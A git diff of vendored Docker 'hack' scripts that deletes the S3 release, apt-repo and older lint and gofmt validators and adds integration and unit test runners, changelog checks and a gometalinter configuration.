-	)
-
-	# clean up after ourselves so we have a clean output directory
-	rm "$DEST/postinst" "$DEST/prerm" "$DEST/postrm"
-	rm -r "$DIR"
-}
-
-bundle_ubuntu
diff --git a/vendor/github.com/docker/docker/hack/make/update-apt-repo b/vendor/github.com/docker/docker/hack/make/update-apt-repo
deleted file mode 100755
index 7354a2ecff..0000000000
--- a/vendor/github.com/docker/docker/hack/make/update-apt-repo
+++ /dev/null
@@ -1,70 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script updates the apt repo in $DOCKER_RELEASE_DIR/apt/repo.
-# This script is a "fix all" for any sort of problems that might have occurred with
-# the Release or Package files in the repo.
-# It should only be used in the rare case of extreme emergencies to regenerate
-# Release and Package files for the apt repo.
-#
-# NOTE: Always be sure to re-sign the repo with hack/make/sign-repos after running
-# this script.
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-APTDIR=$DOCKER_RELEASE_DIR/apt/repo
-
-# supported arches/sections
-arches=( amd64 i386 )
-
-# Preserve existing components but don't add any non-existing ones
-for component in main testing experimental ; do
-	if ls "$APTDIR/dists/*/$component" >/dev/null 2>&1 ; then
-		components+=( $component )
-	fi
-done
-
-dists=( $(find "${APTDIR}/dists" -maxdepth 1 -mindepth 1 -type d) )
-
-# override component if it is set
-if [ "$COMPONENT" ]; then
-	components=( $COMPONENT )
-fi
-
-# release the debs
-for version in "${dists[@]}"; do
-	for component in "${components[@]}"; do
-		codename="${version//debootstrap-}"
-
-		# update the filelist for this codename/component
-		find "$APTDIR/pool/$component" \
-			-name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist"
-	done
-done
-
-# run the apt-ftparchive commands so we can have pinning
-apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf"
-
-for dist in "${dists[@]}"; do
-	version=$(basename "$dist")
-	for component in "${components[@]}"; do
-		codename="${version//debootstrap-}"
-
-		apt-ftparchive \
-			-o "APT::FTPArchive::Release::Codename=$codename" \
-			-o "APT::FTPArchive::Release::Suite=$codename" \
-			-c "$APTDIR/conf/docker-engine-release.conf" \
-			release \
-			"$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release"
-
-		for arch in "${arches[@]}"; do
-			apt-ftparchive \
-				-o "APT::FTPArchive::Release::Codename=$codename" \
-				-o "APT::FTPArchive::Release::Suite=$codename" \
-				-o "APT::FTPArchive::Release::Component=$component" \
-				-o "APT::FTPArchive::Release::Architecture=$arch" \
-				-c "$APTDIR/conf/docker-engine-release.conf" \
-				release \
-				"$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release"
-		done
-	done
-done
diff --git a/vendor/github.com/docker/docker/hack/make/win b/vendor/github.com/docker/docker/hack/make/win
deleted file mode 100644
index f9f4111276..0000000000
--- a/vendor/github.com/docker/docker/hack/make/win
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/bash
-set -e
-
-# explicit list of os/arch combos that support being a daemon
-declare -A daemonSupporting
-daemonSupporting=(
-	[linux/amd64]=1
-	[windows/amd64]=1
-)
-platform="windows/amd64"
-export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION
-mkdir -p "$DEST"
-ABS_DEST="$(cd "$DEST" && pwd -P)"
-export GOOS=${platform%/*}
-export GOARCH=${platform##*/}
-if [ -z "${daemonSupporting[$platform]}" ]; then
-	export LDFLAGS_STATIC_DOCKER="" # we just need a simple client for these platforms
-	export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) # remove the "daemon" build tag from platforms that aren't supported
-fi
-source "${MAKEDIR}/binary"
diff --git a/vendor/github.com/docker/docker/hack/release.sh b/vendor/github.com/docker/docker/hack/release.sh
deleted file mode 100755
index 4b020537ea..0000000000
--- a/vendor/github.com/docker/docker/hack/release.sh
+++ /dev/null
@@ -1,325 +0,0 @@
-#!/usr/bin/env bash
-set -e
-
-# This script looks for bundles built by make.sh, and releases them on a
-# public S3 bucket.
-#
-# Bundles should be available for the VERSION string passed as argument.
-#
-# The correct way to call this script is inside a container built by the
-# official Dockerfile at the root of the Docker source code. The Dockerfile,
-# make.sh and release.sh should all be from the same source code revision.
-
-set -o pipefail
-
-# Print a usage message and exit.
-usage() {
-	cat >&2 <<'EOF'
-To run, I need:
-- to be in a container generated by the Dockerfile at the top of the Docker
-  repository;
-- to be provided with the location of an S3 bucket and path, in
-  environment variables AWS_S3_BUCKET and AWS_S3_BUCKET_PATH (default: '');
-- to be provided with AWS credentials for this S3 bucket, in environment
-  variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY;
-- a generous amount of good will and nice manners.
-The canonical way to run me is to run the image produced by the Dockerfile: e.g.:"
-
-docker run -e AWS_S3_BUCKET=test.docker.com \
-           -e AWS_ACCESS_KEY_ID     \
-           -e AWS_SECRET_ACCESS_KEY \
-           -e AWS_DEFAULT_REGION    \
-           -it --privileged         \
-           docker ./hack/release.sh
-EOF
-	exit 1
-}
-
-[ "$AWS_S3_BUCKET" ] || usage
-[ "$AWS_ACCESS_KEY_ID" ] || usage
-[ "$AWS_SECRET_ACCESS_KEY" ] || usage
-[ -d /go/src/github.com/docker/docker ] || usage
-cd /go/src/github.com/docker/docker
-[ -x hack/make.sh ] || usage
-
-export AWS_DEFAULT_REGION
-: ${AWS_DEFAULT_REGION:=us-west-1}
-
-AWS_CLI=${AWS_CLI:-'aws'}
-
-RELEASE_BUNDLES=(
-	binary
-	cross
-	tgz
-)
-
-if [ "$1" != '--release-regardless-of-test-failure' ]; then
-	RELEASE_BUNDLES=(
-		test-unit
-		"${RELEASE_BUNDLES[@]}"
-		test-integration-cli
-	)
-fi
-
-VERSION=$(< VERSION)
-BUCKET=$AWS_S3_BUCKET
-BUCKET_PATH=$BUCKET
-[[ -n "$AWS_S3_BUCKET_PATH" ]] && BUCKET_PATH+=/$AWS_S3_BUCKET_PATH
-
-if command -v git &> /dev/null && git rev-parse &> /dev/null; then
-	if [ -n "$(git status --porcelain --untracked-files=no)" ]; then
-		echo "You cannot run the release script on a repo with uncommitted changes"
-		usage
-	fi
-fi
-
-# These are the 2 keys we've used to sign the deb's
-#   release (get.docker.com)
-#	GPG_KEY="36A1D7869245C8950F966E92D8576A8BA88D21E9"
-#   test    (test.docker.com)
-#	GPG_KEY="740B314AE3941731B942C66ADF4FD13717AAD7D6"
-
-setup_s3() {
-	echo "Setting up S3"
-	# Try creating the bucket. Ignore errors (it might already exist).
-	$AWS_CLI s3 mb "s3://$BUCKET" 2>/dev/null || true
-	# Check access to the bucket.
-	$AWS_CLI s3 ls "s3://$BUCKET" >/dev/null
-	# Make the bucket accessible through website endpoints.
-	$AWS_CLI s3 website --index-document index --error-document error "s3://$BUCKET"
-}
-
-# write_to_s3 uploads the contents of standard input to the specified S3 url.
-write_to_s3() {
-	DEST=$1
-	F=`mktemp`
-	cat > "$F"
-	$AWS_CLI s3 cp --acl public-read --content-type 'text/plain' "$F" "$DEST"
-	rm -f "$F"
-}
-
-s3_url() {
-	case "$BUCKET" in
-		get.docker.com|test.docker.com|experimental.docker.com)
-			echo "https://$BUCKET_PATH"
-			;;
-		*)
-			BASE_URL="http://${BUCKET}.s3-website-${AWS_DEFAULT_REGION}.amazonaws.com"
-			if [[ -n "$AWS_S3_BUCKET_PATH" ]] ; then
-				echo "$BASE_URL/$AWS_S3_BUCKET_PATH"
-			else
-				echo "$BASE_URL"
-			fi
-			;;
-	esac
-}
-
-build_all() {
-	echo "Building release"
-	if ! ./hack/make.sh "${RELEASE_BUNDLES[@]}"; then
-		echo >&2
-		echo >&2 'The build or tests appear to have failed.'
-		echo >&2
-		echo >&2 'You, as the release  maintainer, now have a couple options:'
-		echo >&2 '- delay release and fix issues'
-		echo >&2 '- delay release and fix issues'
-		echo >&2 '- did we mention how important this is?  issues need fixing :)'
-		echo >&2
-		echo >&2 'As a final LAST RESORT, you (because only you, the release maintainer,'
-		echo >&2 ' really knows all the hairy problems at hand with the current release'
-		echo >&2 ' issues) may bypass this checking by running this script again with the'
-		echo >&2 ' single argument of "--release-regardless-of-test-failure", which will skip'
-		echo >&2 ' running the test suite, and will only build the binaries and packages.  Please'
-		echo >&2 ' avoid using this if at all possible.'
-		echo >&2
-		echo >&2 'Regardless, we cannot stress enough the scarcity with which this bypass'
-		echo >&2 ' should be used.  If there are release issues, we should always err on the'
-		echo >&2 ' side of caution.'
-		echo >&2
-		exit 1
-	fi
-}
-
-upload_release_build() {
-	src="$1"
-	dst="$2"
-	latest="$3"
-
-	echo
-	echo "Uploading $src"
-	echo "  to $dst"
-	echo
-	$AWS_CLI s3 cp --follow-symlinks --acl public-read "$src" "$dst"
-	if [ "$latest" ]; then
-		echo
-		echo "Copying to $latest"
-		echo
-		$AWS_CLI s3 cp --acl public-read "$dst" "$latest"
-	fi
-
-	# get hash files too (see hash_files() in hack/make.sh)
-	for hashAlgo in md5 sha256; do
-		if [ -e "$src.$hashAlgo" ]; then
-			echo
-			echo "Uploading $src.$hashAlgo"
-			echo "  to $dst.$hashAlgo"
-			echo
-			$AWS_CLI s3 cp --follow-symlinks --acl public-read --content-type='text/plain' "$src.$hashAlgo" "$dst.$hashAlgo"
-			if [ "$latest" ]; then
-				echo
-				echo "Copying to $latest.$hashAlgo"
-				echo
-				$AWS_CLI s3 cp --acl public-read "$dst.$hashAlgo" "$latest.$hashAlgo"
-			fi
-		fi
-	done
-}
-
-release_build() {
-	echo "Releasing binaries"
-	GOOS=$1
-	GOARCH=$2
-
-	binDir=bundles/$VERSION/cross/$GOOS/$GOARCH
-	tgzDir=bundles/$VERSION/tgz/$GOOS/$GOARCH
-	binary=docker-$VERSION
-	zipExt=".tgz"
-	binaryExt=""
-	tgz=$binary$zipExt
-
-	latestBase=
-	if [ -z "$NOLATEST" ]; then
-		latestBase=docker-latest
-	fi
-
-	# we need to map our GOOS and GOARCH to uname values
-	# see https://en.wikipedia.org/wiki/Uname
-	# ie, GOOS=linux -> "uname -s"=Linux
-
-	s3Os=$GOOS
-	case "$s3Os" in
-		darwin)
-			s3Os=Darwin
-			;;
-		freebsd)
-			s3Os=FreeBSD
-			;;
-		linux)
-			s3Os=Linux
-			;;
-		solaris)
-			echo skipping solaris release
-			return 0
-			;;
-		windows)
-			# this is windows use the .zip and .exe extensions for the files.
-			s3Os=Windows
-			zipExt=".zip"
-			binaryExt=".exe"
-			tgz=$binary$zipExt
-			binary+=$binaryExt
-			;;
-		*)
-			echo >&2 "error: can't convert $s3Os to an appropriate value for 'uname -s'"
-			exit 1
-			;;
-	esac
-
-	s3Arch=$GOARCH
-	case "$s3Arch" in
-		amd64)
-			s3Arch=x86_64
-			;;
-		386)
-			s3Arch=i386
-			;;
-		arm)
-			s3Arch=armel
-			# someday, we might potentially support multiple GOARM values, in which case we might get armhf here too
-			;;
-		*)
-			echo >&2 "error: can't convert $s3Arch to an appropriate value for 'uname -m'"
-			exit 1
-			;;
-	esac
-
-	s3Dir="s3://$BUCKET_PATH/builds/$s3Os/$s3Arch"
-	# latest=
-	latestTgz=
-	if [ "$latestBase" ]; then
-		# commented out since we aren't uploading binaries right now.
-		# latest="$s3Dir/$latestBase$binaryExt"
-		# we don't include the $binaryExt because we don't want docker.exe.zip
-		latestTgz="$s3Dir/$latestBase$zipExt"
-	fi
-
-	if [ ! -f "$tgzDir/$tgz" ]; then
-		echo >&2 "error: can't find $tgzDir/$tgz - was it packaged properly?"
-		exit 1
-	fi
-	# disable binary uploads for now. Only providing tgz downloads
-	# upload_release_build "$binDir/$binary" "$s3Dir/$binary" "$latest"
-	upload_release_build "$tgzDir/$tgz" "$s3Dir/$tgz" "$latestTgz"
-}
-
-# Upload binaries and tgz files to S3
-release_binaries() {
-	[ "$(find bundles/$VERSION -path "bundles/$VERSION/cross/*/*/docker-$VERSION")" != "" ] || {
-		echo >&2 './hack/make.sh must be run before release_binaries'
-		exit 1
-	}
-
-	for d in bundles/$VERSION/cross/*/*; do
-		GOARCH="$(basename "$d")"
-		GOOS="$(basename "$(dirname "$d")")"
-		release_build "$GOOS" "$GOARCH"
-	done
-
-	# TODO create redirect from builds/*/i686 to builds/*/i386
-
-	cat <<EOF | write_to_s3 s3://$BUCKET_PATH/builds/index
-# To install, run the following commands as root:
-curl -fsSLO $(s3_url)/builds/Linux/x86_64/docker-$VERSION.tgz && tar --strip-components=1 -xvzf docker-$VERSION.tgz -C /usr/local/bin
-
-# Then start docker in daemon mode:
-/usr/local/bin/dockerd
-EOF
-
-	# Add redirect at /builds/info for URL-backwards-compatibility
-	rm -rf /tmp/emptyfile && touch /tmp/emptyfile
-	$AWS_CLI s3 cp --acl public-read --website-redirect '/builds/' --content-type='text/plain' /tmp/emptyfile "s3://$BUCKET_PATH/builds/info"
-
-	if [ -z "$NOLATEST" ]; then
-		echo "Advertising $VERSION on $BUCKET_PATH as most recent version"
-		echo "$VERSION" | write_to_s3 "s3://$BUCKET_PATH/latest"
-	fi
-}
-
-# Upload the index script
-release_index() {
-	echo "Releasing index"
-	url="$(s3_url)/" hack/make.sh install-script
-	write_to_s3 "s3://$BUCKET_PATH/index" < "bundles/$VERSION/install-script/install.sh"
-}
-
-main() {
-	[ "$SKIP_RELEASE_BUILD" -eq 1 ] || build_all
-	setup_s3
-	release_binaries
-	release_index
-}
-
-main
-
-echo
-echo
-echo "Release complete; see $(s3_url)"
-echo "Use the following text to announce the release:"
-echo
-echo "We have just pushed $VERSION to $(s3_url). You can download it with the following:"
-echo
-echo "Linux 64bit tgz: $(s3_url)/builds/Linux/x86_64/docker-$VERSION.tgz"
-echo "Darwin/OSX 64bit client tgz: $(s3_url)/builds/Darwin/x86_64/docker-$VERSION.tgz"
-echo "Windows 64bit zip: $(s3_url)/builds/Windows/x86_64/docker-$VERSION.zip"
-echo "Windows 32bit client zip: $(s3_url)/builds/Windows/i386/docker-$VERSION.zip"
-echo
diff --git a/vendor/github.com/docker/docker/hack/test/e2e-run.sh b/vendor/github.com/docker/docker/hack/test/e2e-run.sh
new file mode 100755
index 0000000000..122d58f8ef
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/test/e2e-run.sh
@@ -0,0 +1,72 @@
+#!/usr/bin/env bash
+set -e -u -o pipefail
+
+ARCH=$(uname -m)
+if [ "$ARCH" == "x86_64" ]; then
+  ARCH="amd64"
+fi
+
+export DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:-${ARCH}}
+
+# Set defaults
+: ${TESTFLAGS:=}
+: ${TESTDEBUG:=}
+
+integration_api_dirs=${TEST_INTEGRATION_DIR:-"$(
+	find /tests/integration -type d |
+	grep -vE '(^/tests/integration($|/internal)|/testdata)')"}
+
+run_test_integration() {
+	[[ "$TESTFLAGS" != *-check.f* ]] && run_test_integration_suites
+	run_test_integration_legacy_suites
+}
+
+run_test_integration_suites() {
+	local flags="-test.v -test.timeout=${TIMEOUT:-10m} $TESTFLAGS"
+	for dir in $integration_api_dirs; do
+		if ! (
+			cd $dir
+			echo "Running $PWD"
+			test_env ./test.main $flags
+		); then exit 1; fi
+	done
+}
+
+run_test_integration_legacy_suites() {
+	(
+		flags="-check.v -check.timeout=${TIMEOUT:-200m} -test.timeout=360m $TESTFLAGS"
+		cd /tests/integration-cli
+		echo "Running $PWD"
+		test_env ./test.main $flags
+	)
+}
+
+# use "env -i" to tightly control the environment variables that bleed into the tests
+test_env() {
+	(
+		set -e +u
+		[ -n "$TESTDEBUG" ] && set -x
+		env -i \
+			DOCKER_API_VERSION="$DOCKER_API_VERSION" \
+			DOCKER_INTEGRATION_DAEMON_DEST="$DOCKER_INTEGRATION_DAEMON_DEST" \
+			DOCKER_TLS_VERIFY="$DOCKER_TEST_TLS_VERIFY" \
+			DOCKER_CERT_PATH="$DOCKER_TEST_CERT_PATH" \
+			DOCKER_ENGINE_GOARCH="$DOCKER_ENGINE_GOARCH" \
+			DOCKER_GRAPHDRIVER="$DOCKER_GRAPHDRIVER" \
+			DOCKER_USERLANDPROXY="$DOCKER_USERLANDPROXY" \
+			DOCKER_HOST="$DOCKER_HOST" \
+			DOCKER_REMAP_ROOT="$DOCKER_REMAP_ROOT" \
+			DOCKER_REMOTE_DAEMON="$DOCKER_REMOTE_DAEMON" \
+			DOCKERFILE="$DOCKERFILE" \
+			GOPATH="$GOPATH" \
+			GOTRACEBACK=all \
+			HOME="$ABS_DEST/fake-HOME" \
+			PATH="$PATH" \
+			TEMP="$TEMP" \
+			TEST_CLIENT_BINARY="$TEST_CLIENT_BINARY" \
+			"$@"
+	)
+}
+
+sh /scripts/ensure-emptyfs.sh
+run_test_integration
diff --git a/vendor/github.com/docker/docker/hack/test/unit b/vendor/github.com/docker/docker/hack/test/unit
new file mode 100755
index 0000000000..d0e85f1ad1
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/test/unit
@@ -0,0 +1,38 @@
+#!/usr/bin/env bash
+#
+# Run unit tests
+#
+# TESTFLAGS - add additional test flags. Ex:
+#
+#   TESTFLAGS="-v -run TestBuild" hack/test/unit
+#
+# TESTDIRS - run tests for specified packages. Ex:
+#
+#    TESTDIRS="./pkg/term" hack/test/unit
+#
+set -eu -o pipefail
+
+TESTFLAGS+=" -test.timeout=${TIMEOUT:-5m}"
+BUILDFLAGS=( -tags "netgo seccomp libdm_no_deferred_remove" )
+TESTDIRS="${TESTDIRS:-"./..."}"
+
+exclude_paths="/vendor/|/integration"
+pkg_list=$(go list $TESTDIRS | grep -vE "($exclude_paths)")
+
+# install test dependencies once before running tests for each package. This
+# significantly reduces the runtime.
+go test -i "${BUILDFLAGS[@]}" $pkg_list
+
+for pkg in $pkg_list; do
+    go test "${BUILDFLAGS[@]}" \
+        -cover \
+        -coverprofile=profile.out \
+        -covermode=atomic \
+        $TESTFLAGS \
+        "${pkg}"
+
+    if test -f profile.out; then
+        cat profile.out >> coverage.txt
+        rm profile.out
+    fi
+done
diff --git a/vendor/github.com/docker/docker/hack/validate/.validate b/vendor/github.com/docker/docker/hack/validate/.validate
index defa981865..32cb6b6d64 100644
--- a/vendor/github.com/docker/docker/hack/validate/.validate
+++ b/vendor/github.com/docker/docker/hack/validate/.validate
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 set -e -o pipefail
 
diff --git a/vendor/github.com/docker/docker/hack/validate/all b/vendor/github.com/docker/docker/hack/validate/all
index 308af47263..9d95c2d2fd 100755
--- a/vendor/github.com/docker/docker/hack/validate/all
+++ b/vendor/github.com/docker/docker/hack/validate/all
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 #
 # Run all validation
 
diff --git a/vendor/github.com/docker/docker/hack/validate/changelog-date-descending b/vendor/github.com/docker/docker/hack/validate/changelog-date-descending
new file mode 100755
index 0000000000..b9c3368ca6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/changelog-date-descending
@@ -0,0 +1,12 @@
+#!/usr/bin/env bash
+
+changelogFile=${1:-CHANGELOG.md}
+
+if [ ! -r "$changelogFile" ]; then
+  echo "Unable to read file $changelogFile" >&2
+  exit 1
+fi
+
+grep -e '^## ' "$changelogFile" | awk '{print$3}' | sort -c -r || exit 2
+
+echo "Congratulations!  Changelog $changelogFile dates are in descending order."
diff --git a/vendor/github.com/docker/docker/hack/validate/changelog-well-formed b/vendor/github.com/docker/docker/hack/validate/changelog-well-formed
new file mode 100755
index 0000000000..6c7ce1a1c0
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/changelog-well-formed
@@ -0,0 +1,25 @@
+#!/usr/bin/env bash
+
+changelogFile=${1:-CHANGELOG.md}
+
+if [ ! -r "$changelogFile" ]; then
+  echo "Unable to read file $changelogFile" >&2
+  exit 1
+fi
+
+changelogWellFormed=1
+
+# e.g. "## 1.12.3 (2016-10-26)"
+VER_LINE_REGEX='^## [0-9]+\.[0-9]+\.[0-9]+(-ce)? \([0-9]+-[0-9]+-[0-9]+\)$'
+while read -r line; do
+  if ! [[ "$line" =~ $VER_LINE_REGEX ]]; then
+    echo "Malformed changelog $changelogFile line \"$line\"" >&2
+    changelogWellFormed=0
+  fi
+done < <(grep '^## ' $changelogFile)
+
+if [[ "$changelogWellFormed" == "1" ]]; then
+  echo "Congratulations!  Changelog $changelogFile is well-formed."
+else
+  exit 2
+fi
diff --git a/vendor/github.com/docker/docker/hack/validate/compose-bindata b/vendor/github.com/docker/docker/hack/validate/compose-bindata
deleted file mode 100755
index f87728259e..0000000000
--- a/vendor/github.com/docker/docker/hack/validate/compose-bindata
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/bin/bash
-
-export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-source "${SCRIPTDIR}/.validate"
-
-IFS=$'\n'
-files=( $(validate_diff --diff-filter=ACMR --name-only -- 'cli/compose/schema/data' || true) )
-unset IFS
-
-if [ ${#files[@]} -gt 0 ]; then
-	go generate github.com/docker/docker/cli/compose/schema 2> /dev/null
-	# Let see if the working directory is clean
-	diffs="$(git status --porcelain -- cli/compose/schema 2>/dev/null)"
-	if [ "$diffs" ]; then
-		{
-			echo 'The result of `go generate github.com/docker/docker/cli/compose/schema` differs'
-			echo
-			echo "$diffs"
-			echo
-			echo 'Please run `go generate github.com/docker/docker/cli/compose/schema`'
-		} >&2
-		false
-	else
-		echo 'Congratulations! cli/compose/schema/bindata.go is up-to-date.'
-	fi
-else
-    echo 'No cli/compose/schema/data changes in diff.'
-fi
diff --git a/vendor/github.com/docker/docker/hack/validate/dco b/vendor/github.com/docker/docker/hack/validate/dco
index 754ce8faec..f391001601 100755
--- a/vendor/github.com/docker/docker/hack/validate/dco
+++ b/vendor/github.com/docker/docker/hack/validate/dco
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 source "${SCRIPTDIR}/.validate"
diff --git a/vendor/github.com/docker/docker/hack/validate/default b/vendor/github.com/docker/docker/hack/validate/default
index 29b96ca9a3..8ec978876d 100755
--- a/vendor/github.com/docker/docker/hack/validate/default
+++ b/vendor/github.com/docker/docker/hack/validate/default
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 #
 # Run default validation, exclude vendor because it's slow
 
@@ -6,11 +6,12 @@ export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 
 . $SCRIPTDIR/dco
 . $SCRIPTDIR/default-seccomp
-. $SCRIPTDIR/gofmt
-. $SCRIPTDIR/lint
+. $SCRIPTDIR/gometalinter
 . $SCRIPTDIR/pkg-imports
 . $SCRIPTDIR/swagger
 . $SCRIPTDIR/swagger-gen
 . $SCRIPTDIR/test-imports
 . $SCRIPTDIR/toml
-. $SCRIPTDIR/vet
+. $SCRIPTDIR/changelog-well-formed
+. $SCRIPTDIR/changelog-date-descending
+. $SCRIPTDIR/deprecate-integration-cli
diff --git a/vendor/github.com/docker/docker/hack/validate/default-seccomp b/vendor/github.com/docker/docker/hack/validate/default-seccomp
index 8fe8435618..24cbf00d24 100755
--- a/vendor/github.com/docker/docker/hack/validate/default-seccomp
+++ b/vendor/github.com/docker/docker/hack/validate/default-seccomp
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 source "${SCRIPTDIR}/.validate"
diff --git a/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli b/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli
new file mode 100755
index 0000000000..da6f8310f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli
@@ -0,0 +1,25 @@
+#!/usr/bin/env bash
+# Check that no new tests are being added to integration-cli
+
+export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+source "${SCRIPTDIR}/.validate"
+
+new_tests=$(
+    validate_diff --diff-filter=ACMR --unified=0 -- 'integration-cli/*_cli_*.go' |
+    grep -E '^\+func (.*) Test' || true
+)
+
+if [ -z "$new_tests" ]; then
+	echo 'Congratulations!  No new tests added to integration-cli.'
+    exit
+fi
+
+echo "The following new tests were added to integration-cli:"
+echo
+echo "$new_tests"
+echo
+echo "integration-cli is deprecated. Please add an API integration test to"
+echo "./integration/COMPONENT/. See ./TESTING.md for more details."
+echo
+
+exit 1
diff --git a/vendor/github.com/docker/docker/hack/validate/gofmt b/vendor/github.com/docker/docker/hack/validate/gofmt
deleted file mode 100755
index 2040afa09e..0000000000
--- a/vendor/github.com/docker/docker/hack/validate/gofmt
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/bin/bash
-
-export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-source "${SCRIPTDIR}/.validate"
-
-IFS=$'\n'
-files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' |
-    grep -v '^vendor/' |
-    grep -v '^cli/compose/schema/bindata.go' || true) )
-unset IFS
-
-badFiles=()
-for f in "${files[@]}"; do
-	# we use "git show" here to validate that what's committed is formatted
-	if [ "$(git show "$VALIDATE_HEAD:$f" | gofmt -s -l)" ]; then
-		badFiles+=( "$f" )
-	fi
-done
-
-if [ ${#badFiles[@]} -eq 0 ]; then
-	echo 'Congratulations!  All Go source files are properly formatted.'
-else
-	{
-		echo "These files are not properly gofmt'd:"
-		for f in "${badFiles[@]}"; do
-			echo " - $f"
-		done
-		echo
-		echo 'Please reformat the above files using "gofmt -s -w" and commit the result.'
-		echo
-	} >&2
-	false
-fi
diff --git a/vendor/github.com/docker/docker/hack/validate/gometalinter b/vendor/github.com/docker/docker/hack/validate/gometalinter
new file mode 100755
index 0000000000..8f42597fce
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/gometalinter
@@ -0,0 +1,13 @@
+#!/usr/bin/env bash
+set -e -o pipefail
+
+SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
+
+# CI platforms differ, so per-platform GOMETALINTER_OPTS can be set
+# from a platform-specific Dockerfile, otherwise let's just set
+# (somewhat pessimistic) default of 10 minutes.
+: ${GOMETALINTER_OPTS=--deadline=10m}
+
+gometalinter \
+	${GOMETALINTER_OPTS} \
+	--config $SCRIPTDIR/gometalinter.json ./...
diff --git a/vendor/github.com/docker/docker/hack/validate/gometalinter.json b/vendor/github.com/docker/docker/hack/validate/gometalinter.json
new file mode 100644
index 0000000000..81eb1017cb
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/validate/gometalinter.json
@@ -0,0 +1,27 @@
+{
+  "Vendor": true,
+  "EnableGC": true,
+  "Sort": ["linter", "severity", "path"],
+  "Exclude": [
+    ".*\\.pb\\.go",
+    "dockerversion/version_autogen.go",
+    "api/types/container/container_.*",
+    "api/types/volume/volume_.*",
+    "integration-cli/"
+  ],
+  "Skip": ["integration-cli/"],
+
+  "Enable": [
+    "deadcode",
+    "gofmt",
+    "goimports",
+    "golint",
+    "gosimple",
+    "ineffassign",
+    "interfacer",
+    "unconvert",
+    "vet"
+  ],
+
+  "LineLength": 200
+}
diff --git a/vendor/github.com/docker/docker/hack/validate/lint b/vendor/github.com/docker/docker/hack/validate/lint
deleted file mode 100755
index 4ac0a33b20..0000000000
--- a/vendor/github.com/docker/docker/hack/validate/lint
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/bin/bash
-
-export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
-source "${SCRIPTDIR}/.validate"
-
-IFS=$'\n'
-files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' | grep -v '^cli/compose/schema/bindata.go' || true) )
-unset IFS
-
-errors=()
-for f in "${files[@]}"; do
-	failedLint=$(golint "$f")
-	if [ "$failedLint" ]; then
-		errors+=( "$failedLint" )
-	fi
-done
-
-if [ ${#errors[@]} -eq 0 ]; then
-	echo 'Congratulations!  All Go source files have been linted.'
-else
-	{
-		echo "Errors from golint:"
-		for err in "${errors[@]}"; do
-			echo "$err"
-		done
-		echo
-		echo 'Please fix the above errors. You can test via "golint" and commit the result.'
-		echo
-	} >&2
-	false
-fi
diff --git a/vendor/github.com/docker/docker/hack/validate/pkg-imports b/vendor/github.com/docker/docker/hack/validate/pkg-imports
index 9e4ea74da0..a9aab6456f 100755
--- a/vendor/github.com/docker/docker/hack/validate/pkg-imports
+++ b/vendor/github.com/docker/docker/hack/validate/pkg-imports
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
diff --git a/vendor/github.com/docker/docker/hack/validate/swagger b/vendor/github.com/docker/docker/hack/validate/swagger
index e754fb8cb9..0b3c2719d8 100755
--- a/vendor/github.com/docker/docker/hack/validate/swagger
+++ b/vendor/github.com/docker/docker/hack/validate/swagger
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 source "${SCRIPTDIR}/.validate"
diff --git a/vendor/github.com/docker/docker/hack/validate/swagger-gen b/vendor/github.com/docker/docker/hack/validate/swagger-gen
index 008abc7e0d..07c22b5a62 100755
--- a/vendor/github.com/docker/docker/hack/validate/swagger-gen
+++ b/vendor/github.com/docker/docker/hack/validate/swagger-gen
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
 source "${SCRIPTDIR}/.validate"
